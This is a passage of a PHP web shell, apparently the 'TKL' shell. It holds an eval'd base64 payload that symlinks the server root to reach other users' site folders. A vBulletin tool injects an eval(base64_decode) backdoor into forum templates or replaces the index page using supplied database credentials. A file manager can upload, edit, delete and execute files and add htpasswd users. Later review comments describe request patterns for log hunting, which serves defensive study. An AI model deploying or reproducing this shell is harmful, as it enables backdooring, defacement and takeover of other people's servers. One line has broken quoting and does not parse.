7IEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUlsMTFbMV1bMF07IGVjaG8gIiA8
dHI+IDx0ZD4gPGRpdiBjbGFzcz0nZG9tJz48YSB0YXJnZXQ9J19ibGFuaycgaHJlZj1odHRwOi8vd3d3LiIuJElJSUlJSUlJSWwxMVsxXVswXS4iLz4iLiRJSUlJSUlJSTFJMWwuIiA8L2E+IDwvZGl2PiA8L3RkPiA8dGQ+IDxhIGhyZWY9J3RrbC9yb290L2hvbWUvIi4kSUlJSUlJSUlJMUkxWyduYW1lJ10uIi9wdWJsaWNfaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPiIuJElJSUlJSUlJSTFJMVsnbmFtZSddLiI8L2E+ICA8L3RkPiA8L3RyPjwvZGl2PiAiOyBmbHVzaCgpOyB9IH0gfSB9";
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "vBulletin-Tool":
|
||
|
echo '<form method="GET">Select Tool : <br><p>
|
||
|
<select name="tool">
|
||
|
<option value="Inject">Shell Inject</option>
|
||
|
<option value="VBindex">Change index</option>
|
||
|
</select>
|
||
|
<input type="submit" value=">>" />
|
||
|
|
||
|
</p>
|
||
|
</form>';
|
||
|
exit;
|
||
|
case "Inject":
|
||
|
echo '
|
||
|
Shell Inject</b></p>';
|
||
|
if (empty($_POST[db])){
|
||
|
print '
|
||
|
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
|
||
|
<br>
|
||
|
Inject To :<br><select size="1" name="template">
|
||
|
<option value="FAQ">FAQ.PHP</option>
|
||
|
<option value="FORUMHOME">FORUMHOME</option>
|
||
|
<option value="search_forums">search forums</option>
|
||
|
<option value="SHOWGROUPS">SHOWGROUPS</option>
|
||
|
<option value="SHOWTHREAD">SHOWTHREAD.PHP</option>
|
||
|
<option value="CALENDAR">CALENDAR.PHP</option>
|
||
|
<option value="MEMBERINFO">MEMBERINFO</option>
|
||
|
<option value="footer">footer</option>
|
||
|
<option value="header">header</option>
|
||
|
<option value="headinclude">headinclude</option>
|
||
|
<option value="lostpw">lostpw</option>
|
||
|
<option value="memberlist">memberlist</option></select></p>
|
||
|
<br> Host : <br><input name="lo" type="text" value="localhost" align="LEFT" size="18">
|
||
|
<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" >
|
||
|
<br>User Name :<br><input name="user" type="text" align="LEFT" size="15" >
|
||
|
<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15" >
|
||
|
<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15" >
|
||
|
<br><input type="submit" value="Inject"/>';
|
||
|
}else{
|
||
|
$a ="{\${eval(base64_decode(\'";
|
||
|
$code ='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';
|
||
|
$template =$_POST['template'];
|
||
|
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
|
||
|
@mysql_select_db($_POST['db']) or die(mysql_error());
|
||
|
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$code."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
|
||
|
$ka= @mysql_query($p) or die(mysql_error());
|
||
|
if ($ka){print'Success <br> Shell Injected in '.$template;}
|
||
|
}
|
||
|
print $f;
|
||
|
|
||
|
exit;
|
||
|
case "VBindex":
|
||
|
if (!$_POST[code]){
|
||
|
print '
|
||
|
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
|
||
|
Change index BY:<br><select size="1" name="t">
|
||
|
<option value="spacer_open">SPACER_OPEN</option>
|
||
|
<option value="spacer_close">SPACER_CLOSE</option>
|
||
|
</select></p>
|
||
|
<br> Host :<br><input name="lo" type="text" value="localhost" align="LEFT" size="18"/>
|
||
|
<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" ><Br>
|
||
|
<br>User Name :<br><input name="user" type="text" align="LEFT" size="15">
|
||
|
<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15">
|
||
|
<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15">
|
||
|
<br>index code[HTML]<br><textarea name="code" cols="41" rows="15" wrap="VIRTUAL" ></textarea><br>
|
||
|
<input type="submit" value="Change index" />';
|
||
|
}else{
|
||
|
$lost = $_POST[t];
|
||
|
$a ="{\${eval(base64_decode(\'";
|
||
|
$tkl_index = base64_encode('echo "'.$_POST[code].'</body></html>";exit;');
|
||
|
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
|
||
|
@mysql_select_db($_POST['db']) or die(mysql_error());
|
||
|
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$tkl_index."\'))}}' WHERE title ='".$lost."'";
|
||
|
$ka= @mysql_query($p) or die(mysql_error());
|
||
|
if ($ka){print"Success ";}
|
||
|
}
|
||
|
print $f;
|
||
|
exit;
|
||
|
}
|
||
|
}
|
||
|
/**
 * Prints the names of the entries in $dir that match the glob pattern "*.*" (that is,
 * names containing a dot) inside a textarea, one per line.
 *
 * The names are written without HTML escaping, and the table/textarea opened here is
 * closed again at the end of this function.
 *
 * @param string $dir Directory to list; the directory prefix is stripped from each match.
 */
function dirTKL ($dir) {
|
||
|
echo '<table><tr><td><u>filename</u></td><td><u>|</u></td><td><u></u></td><tr><td><textarea name="code" cols="20" rows="20" wrap="VIRTUAL">';
|
||
|
foreach (glob("$dir/*.*") as $filename) {
|
||
|
$filename= str_replace("$dir/", "", $filename);
|
||
|
echo $filename.PHP_EOL;
|
||
|
}
|
||
|
echo '</textarea></td></tr></table>';
|
||
|
}
|
||
|
// Page entry point: always prints the header and tool menu, then hands over to
// toolTKL() when the 'tool' query parameter is truthy. The GET parameter 'tool' with
// the menu's button values is another stable string for log and signature hunting.
hidTKL ();
|
||
|
// Parsed as (!$_GET['tool']) == '': true whenever the parameter is a truthy string.
if (!$_GET['tool'] == ''){
|
||
|
toolTKL ();
|
||
|
}
|
||
|
if ($_GET['tool'] == 'Files'){
|
||
|
/**
 * Collects metadata for every entry of a directory.
 *
 * Entry paths are built by plain concatenation, so $directory is expected to end
 * with a path delimiter already. Entries whose lstat() fails are left out. The
 * directory handle is not closed, and $files is never initialised, so the return
 * value is null if no entry could be stat'ed.
 *
 * @param string $directory Directory to read.
 * @return array|false|null One associative array per entry, or false when the
 *                          directory cannot be opened.
 */
function getlist ($directory) {
    global $delim, $win;

    $handle = @opendir($directory);
    if (!$handle) {
        return false;
    }

    while (($name = @readdir($handle)) !== false) {
        $full = $directory . $name;
        $info = @lstat($full);
        if (!$info) {
            continue;
        }

        $entry = array(
            'filename'    => $name,
            'path'        => $full,
            'is_file'     => @is_file($full),
            'is_dir'      => @is_dir($full),
            'is_link'     => @is_link($full),
            'is_readable' => @is_readable($full),
            'is_writable' => @is_writable($full),
            'size'        => $info['size'],
            'permission'  => $info['mode'],
            'owner'       => $info['uid'],
            'group'       => $info['gid'],
            'mtime'       => @filemtime($full),
            'atime'       => @fileatime($full),
            'ctime'       => @filectime($full)
        );

        // A directory counts as "executable" when its "." entry can be reached.
        if ($entry['is_dir']) {
            $entry['is_executable'] = @file_exists($full . $delim . '.');
        } elseif (!$win) {
            $entry['is_executable'] = @is_executable($full);
        } else {
            $entry['is_executable'] = true;
        }

        if ($entry['is_link']) {
            $entry['target'] = @readlink($full);
        }
        // reset() yields the first field of the account / group record.
        if (function_exists('posix_getpwuid')) {
            $entry['owner_name'] = @reset(posix_getpwuid($entry['owner']));
        }
        if (function_exists('posix_getgrgid')) {
            $entry['group_name'] = @reset(posix_getgrgid($entry['group']));
        }

        $files[] = $entry;
    }

    return $files;
}
|
||
|
/**
 * Sorts a list of associative rows in place by one column.
 *
 * @param array  $list    Rows to sort (modified by reference).
 * @param string $key     Column to compare.
 * @param bool   $reverse When truthy, the sorted list is reversed afterwards.
 */
function sortlist (&$list, $key, $reverse) {
    $lastIndex = sizeof($list) - 1;
    quicksort($list, 0, $lastIndex, $key);

    if ($reverse) {
        $list = array_reverse($list);
    }
}
|
||
|
/**
 * In-place recursive quicksort of $array[$first..$last] on column $key, using the
 * middle element's value as pivot.
 *
 * @param array  $array Rows to sort (modified by reference).
 * @param int    $first Index of the first element of the range.
 * @param int    $last  Index of the last element of the range.
 * @param string $key   Column to compare.
 */
function quicksort (&$array, $first, $last, $key) {
    if (!($first < $last)) {
        return;
    }

    $middle = floor(($first + $last) / 2);
    $pivot = $array[$middle][$key];
    $lo = $first;
    $hi = $last;

    while ($lo <= $hi) {
        // Move both cursors inwards until each rests on an out-of-place element.
        while ($array[$lo][$key] < $pivot) {
            $lo++;
        }
        while ($array[$hi][$key] > $pivot) {
            $hi--;
        }
        if ($lo <= $hi) {
            $held = $array[$lo];
            $array[$lo] = $array[$hi];
            $array[$hi] = $held;
            $lo++;
            $hi--;
        }
    }

    quicksort($array, $first, $hi, $key);
    quicksort($array, $lo, $last, $key);
}
|
||
|
/**
 * Renders a numeric file mode as the ten-character string used by directory
 * listings: one file-type character followed by the owner, group and other
 * read/write/execute triads, with setuid, setgid and sticky shown as s/S, s/S, t/T.
 *
 * @param int $mode File mode bits.
 * @return string For example "-rw-r--r--".
 */
function permission_octal2string ($mode) {
    // Checked in this order; the first mask that is fully set decides the type.
    $kinds = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p'
    );
    $text = '?';
    foreach ($kinds as $mask => $letter) {
        if (($mode & $mask) === $mask) {
            $text = $letter;
            break;
        }
    }

    // read bit, write bit, execute bit, special bit, letter with / without execute
    $triads = array(
        array(00400, 00200, 00100, 0x800, 's', 'S'),
        array(00040, 00020, 00010, 0x400, 's', 'S'),
        array(00004, 00002, 00001, 0x200, 't', 'T')
    );
    foreach ($triads as $triad) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;

        $text .= ($mode & $readBit) ? 'r' : '-';
        $text .= ($mode & $writeBit) ? 'w' : '-';
        if ($mode & $specialBit) {
            $text .= ($mode & $execBit) ? $withExec : $withoutExec;
        } else {
            $text .= ($mode & $execBit) ? 'x' : '-';
        }
    }

    return $text;
}
|
||
|
// Reports whether $filename ends in .php, .php3, .php4 or .php5 (case-sensitive match).
// Returns ereg()'s result, i.e. a truthy value on match and false otherwise.
// ereg() was removed in PHP 7.0, so this helper only works on older interpreters.
function is_script ($filename) {
|
||
|
return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
|
||
|
}
|
||
|
// Maps a file name to a MIME type by its extension. The patterns are tried in the
// order listed, case-insensitively, and the first match wins; anything unmatched is
// reported as text/plain.
// eregi() was removed in PHP 7.0, so this helper only works on older interpreters.
function getmimetype ($filename) {
|
||
|
static $mimes = array(
|
||
|
'\.jpg$|\.jpeg$' => 'image/jpeg',
|
||
|
'\.gif$' => 'image/gif',
|
||
|
'\.png$' => 'image/png',
|
||
|
// NOTE(review): both alternatives are ".html"; ".htm" is not covered.
'\.html$|\.html$' => 'text/html',
|
||
|
'\.txt$|\.asc$' => 'text/plain',
|
||
|
'\.xml$|\.xsl$' => 'application/xml',
|
||
|
'\.pdf$' => 'application/pdf'
|
||
|
);
|
||
|
foreach ($mimes as $regex => $mime) {
|
||
|
if (eregi($regex, $filename)) return $mime;
|
||
|
}
|
||
|
return 'text/plain';
|
||
|
}
|
||
|
/**
 * Deletes a file, a symbolic link, or a directory together with its content.
 *
 * Symbolic links are unlinked and never followed. A directory is removed only
 * when every entry inside it could be deleted first.
 *
 * @param string $file Path to delete.
 * @return bool True on success; false when the path does not exist, a directory
 *              cannot be opened, or any part of the deletion fails.
 */
function del ($file) {
    global $delim;

    $isLink = @is_link($file);
    if (!$isLink && !file_exists($file)) {
        return false;
    }

    // Plain files and links (including links that point at directories).
    if ($isLink || !@is_dir($file)) {
        return @unlink($file);
    }

    $dir = @opendir($file);
    if (!$dir) {
        return false;
    }

    $failed = false;
    while (($f = readdir($dir)) !== false) {
        if ($f == '.' || $f == '..') {
            continue;
        }
        if (!del($file . $delim . $f)) {
            $failed = true;
        }
    }
    closedir($dir);

    return $failed ? false : @rmdir($file);
}
|
||
|
/**
 * Ensures that a directory path ends with the platform path delimiter.
 *
 * @param string $directory Path to normalise.
 * @return string The path, with the global $delim appended when it was missing.
 */
function addslash ($directory) {
    global $delim;

    $lastChar = substr($directory, -1, 1);

    return ($lastChar != $delim) ? $directory . $delim : $directory;
}
|
||
|
/**
 * Resolves a path against a base directory and simplifies the result.
 *
 * @param string $string    Path that may be relative or absolute.
 * @param string $directory Base directory used when $string is relative.
 * @return string The simplified path.
 */
function relative2absolute ($string, $directory) {
    $candidate = path_is_relative($string)
        ? addslash($directory) . $string
        : $string;

    return simplify_path($candidate);
}
|
||
|
/**
 * Tells whether a path is relative.
 *
 * With the global $win set, a path is absolute when its second character is a
 * colon (drive letter); otherwise it is absolute when it starts with a slash.
 *
 * @param string $path Path to inspect.
 * @return bool True when the path is relative.
 */
function path_is_relative ($path) {
    global $win;

    $probe = $win ? substr($path, 1, 1) : substr($path, 0, 1);
    $marker = $win ? ':' : '/';

    return ($probe != $marker);
}
|
||
|
/**
 * Expresses $target relative to $directory.
 *
 * While $directory is not a prefix of $target, one "../" step is emitted and
 * $directory is shortened to its parent; the rest of $target after the common
 * prefix is then appended.
 *
 * @param string $directory Base directory, expected to end with the delimiter.
 * @param string $target    Absolute path to express relatively.
 * @return string Relative path, or "." when both paths are equal.
 */
function absolute2relative ($directory, $target) {
    global $delim;

    $relative = '';
    while ($directory != $target) {
        $baseLength = strlen($directory);
        if ($directory == substr($target, 0, $baseLength)) {
            $relative .= substr($target, $baseLength);
            break;
        }

        $relative .= '..' . $delim;
        // Cut back to the previous delimiter, ignoring the trailing one.
        $parentEnd = strrpos(substr($directory, 0, -1), $delim) + 1;
        $directory = substr($directory, 0, $parentEnd);
    }

    return ($relative == '') ? '.' : $relative;
}
|
||
|
/**
 * Normalises a path.
 *
 * Existing paths are resolved with realpath(); directories get a trailing
 * delimiter. For anything else, "/./" segments are collapsed and "segment/../"
 * pairs are removed textually. ereg() and ereg_replace() were removed in PHP 7.0,
 * so the textual fallback only works on older interpreters.
 *
 * @param string $path Path to normalise.
 * @return string The normalised path.
 */
function simplify_path ($path) {
    global $delim;

    $resolvable = @file_exists($path) && function_exists('realpath') && @realpath($path) != '';
    if ($resolvable) {
        $path = realpath($path);
        return @is_dir($path) ? addslash($path) : $path;
    }

    if (@is_dir($path)) {
        $path = addslash($path);
    }

    $dotSegment = $delim . '.' . $delim;
    while (strpos($path, $dotSegment) !== false) {
        $path = str_replace($dotSegment, $delim, $path);
    }

    // Matches "<delim><segment><delim>..<delim>" where <segment> is not "." or "..".
    $e = addslashes($delim);
    $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
    while (ereg($regex, $path)) {
        $path = ereg_replace($regex, $delim, $path);
    }

    return $path;
}
|
||
|
/**
 * Formats a byte count with a binary-scaled unit suffix.
 *
 * The value is divided by 1024 for as long as it is at least 1000, rounded to
 * roughly three significant digits, and suffixed with k, M, G, T, P or E plus "B".
 *
 * @param int|float $filesize Size in bytes.
 * @return string For example "512 B", "2 kB" or "1.5 kB".
 */
function human_filesize ($filesize) {
    $units = 'kMGTPE';

    for ($steps = 0; $filesize >= 1000; $steps++) {
        $filesize /= 1024;
    }

    // Digits after the point shrink as the integer part grows.
    $decimals = 3 - strpos($filesize, '.');
    $filesize = round($filesize, $decimals);

    if (strpos($filesize, '.') !== false) {
        // Drop trailing zeros and a trailing decimal point.
        while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
            $filesize = substr($filesize, 0, strlen($filesize) - 1);
        }
    }

    $unit = ($steps == 0) ? '' : substr($units, $steps - 1, 1);

    return $filesize . " {$unit}B";
}
|
||
|
/**
 * Removes backslash escaping from a string in place.
 *
 * @param string $str Value to unescape (modified by reference).
 */
function strip (&$str) {
    $unescaped = stripslashes($str);
    $str = $unescaped;
}
|
||
|
function listing_page ($message = null) {
|
||
|
global $self, $directory, $sort, $reverse;
|
||
|
html_header();
|
||
|
$list = getlist($directory);
|
||
|
if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
|
||
|
if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
|
||
|
sortlist($list, $sort, $reverse);
|
||
|
echo '
|
||
|
<form enctype="multipart/form-data" action="' . $self . '?tool=Files" method="post">
|
||
|
<table id="main">
|
||
|
';
|
||
|
directory_choice();
|
||
|
if (!empty($message)) {
|
||
|
spacer();
|
||
|
echo $message;
|
||
|
}
|
||
|
if (@is_writable($directory)) {
|
||
|
upload_box();
|
||
|
create_box();
|
||
|
} else {
|
||
|
spacer();
|
||
|
}
|
||
|
if ($list) {
|
||
|
listing($list);
|
||
|
} else {
|
||
|
echo error('not_readable', $directory);
|
||
|
}
|
||
|
echo '</table>
|
||
|
</form>
|
||
|
';
|
||
|
html_footer();
|
||
|
}
|
||
|
/**
 * Emit the table rows of the file listing: a header with sortable column
 * links, one row per directory entry with a per-file action menu, and a
 * footer with the bulk-action menu.
 *
 * For log review, the request shapes this function generates are:
 *   - GET  <script>?tool=Files&dir=<path>[&sort=<col>][&reverse=true]
 *   - GET  <script>?tool=Files&action=view&file=<path>
 *   - GET  <script>?tool=Files&action=permission&file=<path>&dir=<path>
 *   - POST fields checked<N>, file<N>, action<N>, submit<N>, num, focus,
 *     olddir, action_all, submit_all
 *
 * @param array $list entries as produced by getlist() (not visible here);
 *                    each entry is read for the keys filename, path, target,
 *                    size, permission, owner, group, mtime/atime/ctime and
 *                    the is_* flags
 */
function listing ($list) {
    global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
    echo '<tr class="listing">
<th style="text-align: center; vertical-align: middle"></th>
';
    // Common query-string prefix for the column-sort links.
    $d = 'tool=Files&dir=' . urlencode($directory) . '&';
    // Clicking the column that is already sorted ascending flips the order.
    if (!$reverse && $sort == 'filename') $r = '&reverse=true'; else $r = '';
    echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
    if (!$reverse && $sort == 'size') $r = '&reverse=true'; else $r = '';
    echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
    // Permission, owner and group columns are only shown off Windows.
    if (!$win) {
        if (!$reverse && $sort == 'permission') $r = '&reverse=true'; else $r = '';
        echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
        if (!$reverse && $sort == 'owner') $r = '&reverse=true'; else $r = '';
        echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
        if (!$reverse && $sort == 'group') $r = '&reverse=true'; else $r = '';
        echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
    }
    echo ' <th class="functions">' . word('functions') . '</th>
</tr>
';
    for ($i = 0; $i < sizeof($list); $i++) {
        $file = $list[$i];
        // All three timestamps go into the tooltip of the filename cell.
        $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
        $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
        $timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
        echo '<tr class="listing">
<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
<td class="filename" title="' . html($timestamps) . '">';
        if ($file['is_link']) {
            // Symlink: show "name → target" and link to the resolved target
            // when it is readable.
            echo html($file['filename']) . ' → ';
            $real_file = relative2absolute($file['target'], $directory);
            if (@is_readable($real_file)) {
                if (@is_dir($real_file)) {
                    echo '[ <a href="' . $self . '?tool=Files&dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
                } else {
                    echo '<a href="' . $self . '?tool=Files&action=view&file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
                }
            } else {
                echo html($file['target']);
            }
        } elseif ($file['is_dir']) {
            echo ' [ ';
            // A directory is only linked when it can be entered.
            if ($win || $file['is_executable']) {
                echo '<a href="' . $self . '?tool=Files&dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
            echo ' ]';
        } else {
            // Both branches emit an empty string in this copy, so the
            // dot-file test has no visible effect.
            if (substr($file['filename'], 0, 1) == '.') {
                echo '';
            } else {
                echo '';
            }
            if ($file['is_file'] && $file['is_readable']) {
                echo '<a href="' . $self . '?tool=Files&action=view&file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
            } else {
                echo html($file['filename']);
            }
        }
        if ($file['size'] >= 1000) {
            $human = ' title="' . human_filesize($file['size']) . '"';
        } else {
            $human = '';
        }
        echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
        if (!$win) {
            echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
            // The chmod dialog is linked only for non-links that the PHP
            // process owns (or when posix_getuid() is unavailable).
            $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
            if ($l) echo '<a href="' . $self . '?tool=Files&action=permission&file=' . urlencode($file['path']) . '&dir=' . urlencode($directory) . '">';
            echo html(permission_octal2string($file['permission']));
            if ($l) echo '</a>';
            echo "</td>\n";
            if (array_key_exists('owner_name', $file)) {
                echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
            } else {
                echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
            }
            if (array_key_exists('group_name', $file)) {
                echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
            } else {
                echo "\t<td class=\"group\">{$file['group']}</td>\n";
            }
        }
        // The absolute path of each entry travels back in a hidden field and
        // is taken from the POST body as-is by the dispatcher.
        echo ' <td class="functions">
<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
';
        // Build the per-file action menu from what the host permits.
        $actions = array();
        if (function_exists('symlink')) {
            $actions[] = 'create_symlink';
        }
        if (@is_writable(dirname($file['path']))) {
            $actions[] = 'delete';
            $actions[] = 'rename';
            $actions[] = 'move';
        }
        if ($file['is_file'] && $file['is_readable']) {
            $actions[] = 'copy';
            $actions[] = 'download';
            if ($file['is_writable']) $actions[] = 'edit';
        }
        // "execute" is offered only off Windows, when exec() is available,
        // the entry is an executable regular file and /bin/sh exists.
        if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
            $actions[] = 'execute';
        }
        if (sizeof($actions) > 0) {
            echo ' <select class="small" name="action' . $i . '" size="1">
<option value="">' . str_repeat(' ', 30) . '</option>
';
            foreach ($actions as $action) {
                echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
            }
            echo ' </select>
<input class="small" type="submit" name="submit' . $i . '" value=" > " onfocus="activate(\'other\')" />
';
        }
        echo ' </td>
</tr>
';
    }
    echo '<tr class="listing_footer">
<td style="text-align: right; vertical-align: top"></td>
<td colspan="' . ($cols - 1) . '">
<input type="hidden" name="num" value="' . sizeof($list) . '" />
<input type="hidden" name="focus" value="" />
<input type="hidden" name="olddir" value="' . html($directory) . '" />
';
    // Bulk-action menu. $file here is whatever the loop above left behind
    // (the last entry), so the writability test is made on that entry's
    // parent directory.
    $actions = array();
    if (@is_writable(dirname($file['path']))) {
        $actions[] = 'delete';
        $actions[] = 'move';
    }
    $actions[] = 'copy';
    echo ' <select class="small" name="action_all" size="1">
<option value="">' . str_repeat(' ', 30) . '</option>
';
    foreach ($actions as $action) {
        echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
    }
    echo ' </select>
<input class="small" type="submit" name="submit_all" value=" > " onfocus="activate(\'other\')" />
</td>
</tr>
';
}
/**
 * Emit the table row holding the "change directory" control: a link back to
 * $homedir, a free-text `dir` field pre-filled with the current directory,
 * and the `changedir` submit button.
 */
function directory_choice () {
    global $directory, $homedir, $cols, $self;

    $rows = array(
        '<tr>',
        '<td colspan="' . $cols . '" id="directory">',
        '<a href="' . $self . '?tool=Files&dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:',
        '<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />',
        '<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />',
        '</td>',
        '</tr>',
        '',
    );
    echo implode("\n", $rows);
}
/**
 * Emit the table row with the file-upload control. The file field is named
 * `upload` and the button `submit_upload`; both names are what the request
 * dispatcher looks for when it selects the 'upload' action.
 */
function upload_box () {
    global $cols;

    $rows = array(
        '<tr>',
        '<td colspan="' . $cols . '" id="upload">',
        word('file') . ':',
        '<input type="file" name="upload" onfocus="activate(\'other\')" />',
        '<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />',
        '</td>',
        '</tr>',
        '',
    );
    echo implode("\n", $rows);
}
/**
 * Emit the table row with the "create file / create directory" control
 * (fields `create_type`, `create_name`, button `submit_create`).
 */
function create_box () {
    global $cols;

    $rows = array(
        '<tr>',
        '<td colspan="' . $cols . '" id="create">',
        '<select name="create_type" size="1" onfocus="activate(\'create\')">',
        '<option value="file">' . word('file') . '</option>',
        '<option value="directory">' . word('directory') . '</option>',
        '</select>',
        '<input type="text" name="create_name" onfocus="activate(\'create\')" />',
        '<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />',
        '</td>',
        '</tr>',
        '',
    );
    echo implode("\n", $rows);
}
/**
 * Render the text-editor page for one file.
 *
 * The textarea is filled from the previous POST (`content`) when present,
 * otherwise from the file on disk. Two Apache-specific helpers append text
 * to the textarea before it is shown: an htpasswd-style "user:hash" line and
 * a Basic-auth directive block. Nothing is written here; the content reaches
 * disk only when the form comes back with `save` set and the dispatcher's
 * 'edit' case runs. For incident response this means access-control files
 * (the names held in $htaccess / $htpasswd, defined outside this section) in
 * directories writable by the web server account are worth diffing against a
 * known-good copy.
 *
 * @param string $file path of the file to edit
 */
function edit ($file) {
    global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
    html_header();
    echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
<form action="' . $self . '?tool=Files" method="post">
<table class="dialog">
<tr>
<td class="dialog">
<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
    if (array_key_exists('content', $_POST)) {
        // Posted content is echoed back without html(), unlike the
        // file-read branch below.
        echo $_POST['content'];
    } else {
        $f = fopen($file, 'r');
        while (!feof($f)) {
            echo html(fread($f, 8192));
        }
        fclose($f);
    }
    // "add" button on an htpasswd file: append "<user>:<crypt(password)>".
    if (!empty($_POST['user'])) {
        echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
    }
    // "add basic-authentification" button on an htaccess file: append the
    // directives pointing at $htpasswd in the current directory.
    if (!empty($_POST['basic_auth'])) {
        // $win is not in this function's global list, so it is an unset
        // local here.
        if ($win) {
            $authfile = str_replace('\\', '/', $directory) . $htpasswd;
        } else {
            $authfile = $directory . $htpasswd;
        }
        // NOTE(review): the bare inner double quotes on the next two lines
        // look like entity-decoding damage from the page render (presumably
        // &quot; in the original file); as shown they do not parse.
        echo "\nAuthType Basic\nAuthName "Restricted Directory"\n";
        echo 'AuthUserFile "' . html($authfile) . ""\n";
        echo 'Require valid-user';
    }
    echo '</textarea>
<hr />
';
    // Extra controls appear only when the server is taken to be Apache and
    // the file's base name matches the configured htpasswd / htaccess name.
    if ($apache && basename($file) == $htpasswd) {
        echo '
' . word('user') . ': <input type="text" name="user" />
' . word('password') . ': <input type="password" name="password" />
<input type="submit" value="' . word('add') . '" />
<hr />
';
    }
    if ($apache && basename($file) == $htaccess) {
        echo '
<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
<hr />
';
    }
    echo '
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" />
<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
<p><a href="' . $self . '?tool=Files&dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
</form>
';
    html_footer();
}
/**
 * Emit an empty, 1em-high table row spanning all $cols columns.
 */
function spacer () {
    global $cols;

    $rows = array(
        '<tr>',
        '<td colspan="' . $cols . '" style="height: 1em"></td>',
        '</tr>',
        '',
    );
    echo implode("\n", $rows);
}
/**
 * Width for a text input showing $content: its length plus 5, never below 30.
 *
 * @param string $content text the field will hold
 * @return int value for the input's size attribute
 */
function textfieldsize ($content) {
    return max(30, strlen($content) + 5);
}
/**
 * Re-emit every request parameter as a hidden form field so that a
 * confirmation dialog (delete / move / copy) carries the original selection
 * forward to the next POST. Keys and values pass through html().
 */
function request_dump () {
    foreach ($_REQUEST as $key => $value) {
        printf("\t<input type=\"hidden\" name=\"%s\" value=\"%s\" />\n", html($key), html($value));
    }
}
/**
 * Escape a string for HTML output using the global $charset.
 *
 * ENT_COMPAT converts double quotes but leaves single quotes untouched.
 *
 * @param string $string raw text
 * @return string entity-encoded text
 */
function html ($string) {
    global $charset;

    $encoded = htmlentities($string, ENT_COMPAT, $charset);
    return $encoded;
}
/**
 * Look up a UI label in the global $words table and entity-encode it with
 * the table's own charset ($word_charset).
 *
 * @param string $word key into $words
 * @return string encoded label
 */
function word ($word) {
    global $words, $word_charset;

    $label = $words[$word];
    return htmlentities($label, ENT_COMPAT, $word_charset);
}
/**
